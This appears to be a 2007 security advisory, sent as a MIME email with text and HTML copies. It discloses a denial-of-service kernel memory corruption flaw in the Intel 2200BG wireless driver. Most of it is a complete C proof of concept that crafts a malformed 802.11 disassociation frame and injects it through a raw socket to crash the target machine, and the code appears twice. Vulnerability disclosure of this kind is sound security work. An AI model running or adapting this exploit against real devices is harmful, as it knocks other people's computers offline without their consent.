
intel-dos.txt

Posted on 27 January 2007

------=_Part_72042_24806074.1169818557157
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption

Description: The intel wireless mini-pci driver provided with Intel 2200BG cards is vulnerable to a remote memory corruption flaw. Malformed disassociation packets can be used to corrupt internal kernel structures, causing a denial of service (BSOD)

This vulnerability was found at Intel 2200 driver version 9.0.3.9 (09/12/2005).

Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd

Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)

Proof Of Concept:

#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// 28 bytes disassociation packet.
// Layout as written below: 2+2+6+6+6+2 = 24 bytes of 802.11 management
// header, then 4 trailing bytes. The trailing comment calls them a 2-byte
// reason code, but the initializer supplies 4 bytes — presumably that extra
// length is the "malformed" part the advisory refers to; confirm against the
// driver's parsing before relying on that reading.
// NOTE(review): octets above 0x7f (0xa0, 0xbb, 0xf0, 0xd0) are stored in a
// plain char array; unsigned char would be the conventional type for raw bytes.
char d[] = { 0xa0, 0x00,   // 0xa0 = Disassociate packet, 0xa000 FC Normal (frame control)
             0x00, 0x00,   // Duration ID
             0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr (hard-coded constant)
             0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr (hard-coded constant)
             0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id (hard-coded constant)
             0x00, 0x00,   // Frag. Number (NOTE(review): this 2-byte slot is the sequence-control field, fragment + sequence number)
             0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code (the initializer actually contributes 4 bytes here)

// Sends the frame above exactly once on the hard-coded interface "ath0raw".
// Return value: 0 on success; failures return either 0 or -1 — the two codes
// are used inconsistently (see the individual returns below).
// Opening a PF_PACKET/SOCK_RAW socket needs raw-socket privilege
// (root or CAP_NET_RAW on Linux), so the program fails early otherwise.
int main() {
    struct sockaddr_ll link;
    struct ifreq iface;
    int s;
    char packet[sizeof(d)];   // local copy of d; redundant, d itself could be handed to sendto
    int len = 0;              // byte count reported by sendto (ssize_t narrowed to int)

    // Throw-away AF_INET datagram socket, used only to issue the interface ioctls below.
    if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
        return 0;   // NOTE(review): this failure returns 0 while later ones return -1

    bzero(&iface,sizeof(iface));
    bzero(&link,sizeof(link));
    bzero(packet,sizeof(d));

    // Interface name is fixed; ifr_name is a fixed-size array and this literal fits in it.
    strcpy(iface.ifr_name,"ath0raw");

    // The hardware address fetched here is never read; the call only serves as
    // an "interface exists" check through its return value.
    if(ioctl(s,SIOCGIFHWADDR, &iface)) {
        return 0;
    }

    // Resolve the interface index that bind() needs below.
    if(ioctl(s,SIOCGIFINDEX, &iface)) {
        return -1;
    }

    // NOTE(review): s is reassigned here, so the AF_INET socket above is never
    // closed; it (and, on the error returns below, the raw socket too) is
    // leaked until process exit. Harmless for a one-shot program, but a
    // goto-cleanup with close() would be the tidy form.
    if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
        return -1;
    }

    // Bind the raw socket to the resolved interface; every other sockaddr_ll
    // field stays zero from the bzero above.
    link.sll_family = AF_PACKET;
    link.sll_ifindex = iface.ifr_ifindex;

    if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
        return -1;
    }

    // Single transmission of the 28-byte frame on the bound socket, with no
    // explicit destination (NULL, 0). A -1 from sendto is printed, not handled.
    memcpy(packet,d,sizeof(d));
    len = sendto(s,packet,sizeof(d), 0, NULL, 0);
    usleep(5000);
    printf("%d bytes enviados ",len);   // "bytes sent" (Portuguese); runtime string kept as-is

    close(s);

    return 0;
}

------=_Part_72042_24806074.1169818557157 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline <p>Title:&nbsp; Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption</p> <p>Description:&nbsp; The intel wireless mini-pci driver provided with Intel<br>2200BG cards is vulnerable to a remote&nbsp; memory corruption flaw.<br>Malformed disassociation packets can be used to corrupt internal kernel<br>structures, causing a denial of service (BSOD) </p> <p>This vulnerability was found at Intel 2200 driver version 9.0.3.9(09/12/2005).</p> <p>Driver files:</p> <p>w29n51.sys&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 9ee38ffcb4cbe5bee6c305700ddc4725<br>w29mlres.dll&nbsp;&nbsp;&nbsp; 35afeccc4092b69f62d757c4707c74e9<br>w29NCPA.dll&nbsp;&nbsp;&nbsp;&nbsp; 980f58b157baedc23026dd9302406bdd</p> <p>Author: Breno Silva Pinto ( <a href="http://Sekure.org">Sekure.org</a> ) / bsilva[at]sekure[dot]org)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </p> <p>Proof Of Concept:</p> <p>#include &lt;unistd.h&gt;<br>#include &lt;sys/types.h&gt;<br>#include &lt;sys/socket.h&gt;<br>#include &lt;sys/ioctl.h&gt;<br>#include &lt;asm/types.h&gt;<br>#include &lt;linux/if.h&gt;<br>#include 
&lt;linux/if_packet.h&gt; <br>#include &lt;linux/if_ether.h&gt;<br>#include &lt;linux/if_arp.h&gt;<br>#include &lt;netinet/in.h&gt;<br>#include &lt;stdlib.h&gt;<br>#include &lt;string.h&gt;<br>#include &lt;stdio.h&gt;</p> <p>// 28 bytes disassociation packet.</p> <p>char d[] = { 0xa0, 0x00,&nbsp;&nbsp;&nbsp; // 0xa0 pacote Disassociate&nbsp; 0xa000 FC Normal<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x00, // Duration ID<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x00, 0x00, // Frag. Number<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code</p> <p>int main() {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct sockaddr_ll link;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; struct ifreq iface;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int s;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; char packet[sizeof(d)];<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; int len = 0;</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((s=socket(PF_INET, SOCK_DGRAM, 0))&lt;0)<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(&amp;iface,sizeof(iface));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(&amp;link,sizeof(link));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; bzero(packet,sizeof(d));</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; strcpy(iface.ifr_name,&quot;ath0raw&quot;);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(ioctl(s,SIOCGIFHWADDR, &amp;iface)) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
return 0;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if(ioctl(s,SIOCGIFINDEX, &amp;iface)) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))&lt;0) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; link.sll_family = AF_PACKET;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; link.sll_ifindex = iface.ifr_ifindex;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <br>&nbsp;if(bind(s,(struct sockaddr *) &amp;link, sizeof(link))&lt;0) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return -1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memcpy(packet,d,sizeof(d));<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; len = sendto(s,packet,sizeof(d), 0, NULL, 0);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; usleep(5000); <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; printf(&quot;%d bytes enviados &quot;,len);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; close(s);</p> <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;<br>}</p> <p>&nbsp;</p> ------=_Part_72042_24806074.1169818557157--

 
